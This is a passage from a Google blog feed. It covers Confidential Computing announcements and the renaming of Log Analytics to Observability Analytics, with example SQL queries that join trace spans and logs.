&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are proud to collaborate with Apple to extend Apple’s privacy and security commitments to PCC on Google Cloud. Our platform supports Apple’s PCC privacy commitments with a layered security approach built upon Google Cloud’s infrastructure. This includes leveraging Google Cloud Confidential Computing with &lt;/span&gt;&lt;a href="https://www.intel.com/content/www/us/en/developer/tools/trust-domain-extensions/overview.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Intel TDX&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.nvidia.com/en-us/data-center/solutions/confidential-computing/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NVIDIA Confidential Computing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with NVIDIA Blackwell GPUs, our &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/docs/security/titanium-hardware-security-architecture"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Titanium security architecture&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with the Titan chip, and a co-engineered open-source host stack to ensure verifiable transparency.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Together, these technologies help Apple PCC on Google Cloud meet stringent requirements for data protection and user privacy. To dive deeper into this collaboration, read our blog post: &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/powering-the-next-era-of-confidential-ai/?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Powering the next era of Confidential AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Advancing confidential foundations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud is committed to making Confidential Computing capabilities broadly available across our infrastructure. Our goal is to integrate hardware-based security features deeply into our foundational compute offerings, allowing customers to enhance data protection without compromising performance or operational flexibility.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Bringing Intel Trusted Domain Extensions (TDX) to the C4 machine series&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Confidential VMs with Intel TDX on the C4 machine series will be available in preview soon.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Powered by the latest 6th Generation Intel Xeon processors, this integration offers a significant leap in compute density and performance for data-intensive workloads. By using Intel TDX, C4 instances create hardware-isolated Trust Domains (TDs) that protect sensitive applications and data from the underlying host and hypervisor. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This architecture provides confidentiality and privacy while enabling remote attestation so you can cryptographically verify the environment before processing sensitive data. Best of all, you can turn Confidential Computing on with a few clicks and no code changes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Expanding Live Migration capabilities&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Running mission-critical production environments requires high availability and continuous uptime, even during scheduled cloud maintenance. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Live Migration on C3D-based Confidential VMs is now generally available. This capability allows Google Cloud to perform planned hardware maintenance without interrupting workloads or exposing encrypted guest memory, ensuring seamless uptime for long-running confidential applications.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhancing trust and collaboration: Innovations in Confidential Space&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/confidential-computing/confidential-space/docs/confidential-space-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential Space&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a Confidential Computing environment designed to enable secure multi-party computation and data sharing. It allows organizations to collaborate on sensitive data, such as for joint machine learning or data analytics, without revealing the data to each other or to Google Cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“Google Cloud Confidential Space allows us to provide financial institutions with security guarantees similar to or better than an on-prem service," said Olivier Richaud, vice-president, Platforms and Site Reliability Engineering, Symphony. "Transitioning such security and privacy-sensitive customers to a cloud-based SaaS service would have been impossible without the power of Confidential Computing.”&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A key design principle of Confidential Space is to remove the workload operator from the trust boundary, providing cryptographic assurance that only the authorized, attested workload can access the data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“As AI systems increasingly act on behalf of consumers in financial services, trust in how data is processed becomes paramount. At Sahamati, we see Google Cloud Confidential Space as a foundational technology for enabling privacy-preserving AI in India’s Open Finance ecosystem, creating the trust needed for innovation while maintaining strong security and accountability guarantees,” said Kiran Gopinath, chief innovation officer, and Head, Sahamati Labs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our new advancements for Confidential Space provide greater flexibility and stronger assurances. Key updates include:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Independent Verification: Integration with Intel Trust Authority&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are pleased to announce that &lt;/span&gt;&lt;a href="https://www.intel.com/content/www/us/en/security/trust-authority.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Intel Trust Authority&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (ITA) is now generally available as an independent attestation verifier service for Confidential Space.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This integration enables organizations to independently verify the integrity of the Confidential Space environment using Intel’s hardware-rooted attestation before encryption keys are released to workloads. By decoupling attestation verification from the cloud service provider, customers benefit from enhanced transparency, stronger assurance, and a more robust trust model.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"With Confidential Computing woven into our core infrastructure, Google Cloud and Intel are making hardware‑rooted security and independent attestation part of the default fabric of modern compute. From Intel TDX‑powered C4 Confidential VMs running production workloads, to Confidential Space with Intel Trust Authority — now generally available — enabling verifiable multi‑party collaboration, customers can now encrypt, verify, and scale their most sensitive AI and data workflows without rewriting applications or compromising performance, even in the most demanding regulatory environments,” said Anand Pashupathy, general manager and vice-president, Intel Product Assurance and Security (IPAS), Intel Corporation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Accelerating secure collaboration: Confidential Space with H100 GPU support&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To power secure multi-party AI and machine learning, Confidential Space &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/confidential-computing/confidential-space/docs/deploy-workloads#gpu-based-workloads"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;support&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for &lt;/span&gt;&lt;a href="https://www.nvidia.com/en-us/data-center/technologies/hopper-architecture/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NVIDIA Hopper&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; GPUs is now generally available. This can help multiple parties pool their data for training and inference within a Confidential Space environment, using the power of Hopper GPUs, while ensuring that their individual data remains protected from other participants and from Google Cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Confidential Space unlocks use cases like federated learning on sensitive datasets, and building joint models without centralizing data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“Confidential GPU support in Google Cloud Confidential Space removes one of the biggest barriers to adopting secure AI: the tradeoff between protecting sensitive workloads and achieving production-grade performance," said Adi Hirschtein, VP Product, Duality. "For Duality customers in healthcare, financial services, and government, this enables federated learning, confidential AI, and encrypted RAG workflows to run on sensitive data at scale while keeping data and models protected throughout processing.”&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Next steps&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Confidential Computing is becoming an essential layer of cloud computing in the AI era. Explore our expanding portfolio of Confidential VMs, accelerated hardware, and open-source tools to see how you can enable secure collaboration and private AI innovation within your organization.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more, join us at the &lt;/span&gt;&lt;a href="https://events.linuxfoundation.org/confidential-computing-summit/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential Computing Summit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on June 23 and 24, 2026.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/verifiable-trust-in-the-ai-era-whats-new-in-confidential-computing" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-23T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/management-tools/query-logs-and-traces-with-sql-in-observability-analytics</id>
    <title>Log Analytics is now Observability Analytics: Query logs and traces with SQL</title>
    <updated>2026-06-23T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To effectively operate and troubleshoot applications, developers and site reliability engineers (SREs) need to understand the full context of their system's behavior, typically as part of their logging and observability tooling. Today, we’re excited to announce a variety of new capabilities in our &lt;/span&gt;&lt;a href="https://cloud.google.com/products/observability"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Observability&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; suite:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Log Analytics&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; is now &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Observability Analytics.&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Trace data&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; within Observability Analytics is generally available (GA).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Observability API&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for management and configuration is GA.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Together, these bring &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;logs and traces&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; together into a unified experience, helping you go from viewing high-level trends to deep, contextual, root-cause analysis for agentic as well as traditional workloads, and to configure and manage those workloads programmatically, as part of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/stackdriver/docs/observability/storage-manage"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;observability buckets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Further, support for SQL in Cloud Trace is an important new tool in your toolbelt. You can, for instance, write a single SQL query that joins your application logs with your distributed trace spans and find any checkout requests that took longer than 5 seconds, to instantly see which internal microservice spent the most time processing them. Or, for AI agents, you can analyze telemetry across thousands of runs to identify which tool calls most frequently fail, or calculate the aggregated P95 response time for all external tool executions to pinpoint performance bottlenecks. The possibilities are endless!&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, let’s take a closer look at Observability Analytics, and a few key use cases leveraging traces and logs, so you can put these new capabilities to work in your environment right away. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What is Observability Analytics?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Observability Analytics, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/devops-sre/introducing-cloud-loggings-log-analytics-powered-by-big-query"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;formerly Log Analytics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, brings the power of BigQuery and SQL to your telemetry data directly within Cloud Observability. It allows you to run complex analytical queries joining high-volume log and trace data to identify patterns, troubleshoot issues, and generate insights into your agent and application's health and performance without having to move or duplicate data. This brings a number of important benefits:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Unified telemetry:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Run SQL queries to analyze and JOIN high-volume log and trace data in a single place.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Business correlation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Join your observability datasets with business-critical data stored in BigQuery (e.g., conversion rates, revenue, operational costs) to quantify the business impact of technical issues.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;In-place analysis:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Analyze your data where it’s already stored (in Cloud Logging and Cloud Trace), reducing duplicate export storage costs and complexity. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For instance, with Cloud Observability, you can analyze how application latency impacts conversion rates or identify the financial implications of service outages, transforming raw telemetry into actionable business intelligence.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Unlock deeper insights with traces and logs&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Correlating logs and traces in a single analytics view breaks down data silos and accelerates troubleshooting. You can now analyze performance trends from trace data and directly correlate them with corresponding application or infrastructure logs to understand the “why” behind the “what.” Let’s take a couple of examples.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Use case 1: AI agent optimization (analyzing tool failures and latency at scale)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AI agents often perform complex, multi-step tasks by executing various external tools (e.g., database queries, web searches, API calls). When optimizing agents at scale, inspecting individual trace graphs in a UI often isn't enough. You need to answer systemic questions like “Which tools are failing most frequently?” and “Which ones are causing latency bottlenecks?”&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With Observability Analytics, you can run aggregate queries across millions of span events to calculate failure rates and latency percentiles (like P95) for every tool in your system.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Example query:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rank agent tools by failure rate and 95th percentile latency over the last 7 days.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT\r\n  JSON_VALUE(attributes, \&amp;#x27;$.&amp;quot;agent.tool.name&amp;quot;\&amp;#x27;) AS tool_name,\r\n  COUNT(span_id) AS total_calls,\r\n  -- Calculate failure rate (status.code = 2 represents ERROR in OpenTelemetry)\r\n  SAFE_DIVIDE(COUNTIF(status.code = 2), COUNT(span_id)) * 100 AS failure_rate_percentage,\r\n  -- Calculate P95 latency in milliseconds\r\n  APPROX_QUANTILES(duration_nano / 1000000, 100)[OFFSET(95)] AS p95_latency_ms\r\nFROM\r\n  `YOUR_PROJECT_ID.us._Trace.Spans._AllSpans`\r\nWHERE\r\n  name = \&amp;#x27;Agent.executeTool\&amp;#x27; -- Filter for spans representing tool execution\r\n  AND start_time BETWEEN TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 7 DAY) AND CURRENT_TIMESTAMP()\r\nGROUP BY\r\n  tool_name\r\nORDER BY\r\n  failure_rate_percentage DESC, p95_latency_ms DESC\r\nLIMIT 10&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85813708e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With the above query, you can:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Spot bottlenecks&lt;/strong&gt;: Instantly see if a tool like &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;DatabaseQueryTool&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; has a P95 latency of 8 seconds, indicating you need to optimize database indexes or connections.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Identify flaky tools&lt;/strong&gt;: Discover if a specific API tool has a 15% failure rate, suggesting API rate limits or integration bugs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Drill down to the prompt&lt;/strong&gt;: Once you identify a flaky tool, you can write a follow-up query joining these trace spans with application logs to extract the exact LLM prompt and reasoning that led to the failures. Here’s that SQL query:&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT\r\n  t.name AS tool_name,\r\n  l.timestamp,\r\n  -- Retrieve the agent\&amp;#x27;s thoughts and the prompt from application logs\r\n  JSON_VALUE(l.json_payload.agent_thoughts) AS agent_reasoning,\r\n  JSON_VALUE(l.json_payload.llm_prompt) AS prompt_sent_to_llm\r\nFROM\r\n  `YOUR_PROJECT_ID.us._Trace.Spans._AllSpans` t\r\nJOIN\r\n  `YOUR_PROJECT_ID.us._Default._AllLogs` l\r\nON\r\n  t.trace_id = SPLIT(l.trace, \&amp;#x27;/\&amp;#x27;)[SAFE_OFFSET(3)]\r\n  AND t.span_id = l.spanId\r\nWHERE\r\n  t.name = \&amp;#x27;Agent.executeTool\&amp;#x27;\r\n  AND JSON_VALUE(t.attributes, \&amp;#x27;$.&amp;quot;agent.tool.name&amp;quot;\&amp;#x27;) = \&amp;#x27;NameOfFlakyTool\&amp;#x27;\r\n  AND t.status.code = 2 -- Filter for failed tool calls\r\n  AND l.severity = \&amp;#x27;ERROR\&amp;#x27;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f8581370640&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Use case 2: Identify latency impact on specific customers (business context)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you don't propagate user or customer identifiers in your trace attributes (e.g., for privacy or technical reasons), but you do log them in your application access logs, you can join traces and logs to identify which customers are experiencing the worst performance.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Example query:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Find the top 10 customers experiencing the highest 95th percentile latency.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT\r\n  JSON_VALUE(l.json_payload.customer_id) AS customer_id,\r\n  AVG(t.duration_nano / 1000000) AS avg_latency_ms,\r\n  APPROX_QUANTILES(t.duration_nano / 1000000, 100)[OFFSET(95)] AS p95_latency_ms,\r\n  COUNT(t.span_id) AS total_requests\r\nFROM\r\n  `YOUR_PROJECT_ID.us._Trace.Spans._AllSpans` AS t\r\nJOIN\r\n  `YOUR_PROJECT_ID.us._Default._AllLogs` AS l\r\nON\r\n  t.trace_id = SPLIT(l.trace, &amp;#x27;/&amp;#x27;)[SAFE_OFFSET(3)]\r\n  AND t.span_id = l.spanId\r\nWHERE\r\n  t.start_time BETWEEN TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 1 DAY) AND CURRENT_TIMESTAMP()\r\n  AND t.kind.name = &amp;#x27;SPAN_KIND_SERVER&amp;#x27;\r\n  AND JSON_VALUE(l.json_payload.customer_id) IS NOT NULL\r\nGROUP BY\r\n  customer_id\r\nORDER BY\r\n  p95_latency_ms DESC\r\nLIMIT 10&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f85802263a0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can find more query examples for trace in this &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/observability-analytics-samples" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;github repo&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Observability Analytics page vs. log and trace explorers&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cloud Logging and Trace will both continue to offer &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;log and trace explorers&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; — tools that are optimized for finding and inspecting individual log entries and traces, making them ideal for investigating a specific issue.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Observability Analytics, in contrast, is designed for aggregations and in-depth analysis. Think of it as your tool for answering broad questions about your services, such as "What is the 95th percentile latency for my checkout service over the last week?" or "Which API endpoints have the highest error rate after our last deployment?"&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Enabling AI agents to query traces and logs using SQL&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, w&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ith rapid growth in agentic assistants, you need to be able to access your telemetry programmatically. The &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/stackdriver/docs/reference/observability/api/rest/v1/projects.locations.buckets.datasets.links/create?rep_location=global"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Observability API&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; lets you create linked BigQuery datasets for your observability buckets, making the data available to query directly from the BigQuery ecosystem. Now, your AI agents or analytical workloads can query this data directly via standard BigQuery APIs and tooling.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started today&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can start analyzing your trace data in Observability Analytics today. Simply navigate to the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/logs/analytics"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Observability Analytics&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; page in the Google Cloud console to begin exploring your trace data. Ensure you have enabled the Observability API to unlock configurations and management capabilities.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/management-tools/query-logs-and-traces-with-sql-in-observability-analytics" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-23T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/search/summergeist-google-trends</id>
    <title>What’s trending on Google this summer</title>
    <updated>2026-06-23T16:00:00+00:00</updated>
    <content type="html">Bright, colorful illustration on a red background showing a blue/green/yellow ombre sun, palm trees, flip flops, sunglasses and shell</content>
    <link href="https://blog.google/products-and-platforms/products/search/summergeist-google-trends" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-23T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/verifiable-trust-in-the-ai-era-whats-new-in-confidential-computing/</id>
    <title>Verifiable, private AI: Google Cloud expands Confidential Computing frontiers</title>
    <updated>2026-06-23T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Protecting sensitive data used with AI is a critical part of our commitment to providing advanced and secure cloud infrastructure. Confidential Computing cryptographically protects data in use in hardware-based Trusted Execution Environments (TEEs) with verifiable data integrity. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are thrilled to share our latest &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/confidential-computing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential Computing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; innovations across our hardware ecosystem that help further strengthen verifiable privacy in cloud AI deployments. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Confidential AI at global scale&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By scaling our Confidential AI capabilities globally, we help ensure that AI inference and fine-tuning workloads can run with enforceable privacy guarantees. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Democratizing Confidential AI: Confidential G4 VMs with NVIDIA RTX PRO 6000 Blackwell GPUs in preview&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce a landmark moment for accessible Confidential AI at global scale:  &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/confidential-computing/confidential-vm/docs/create-a-confidential-vm-instance-with-gpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential VMs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/gpus-confidential-nodes"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential GKE&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Nodes on the accelerator-optimized &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-series"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;G4 machine series&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, featuring &lt;/span&gt;&lt;a href="https://www.nvidia.com/en-us/products/workstations/professional-desktop-gpus/rtx-pro-6000-family/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NVIDIA &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;RTX PRO 6000 &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Blackwell Server Edition GPUs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
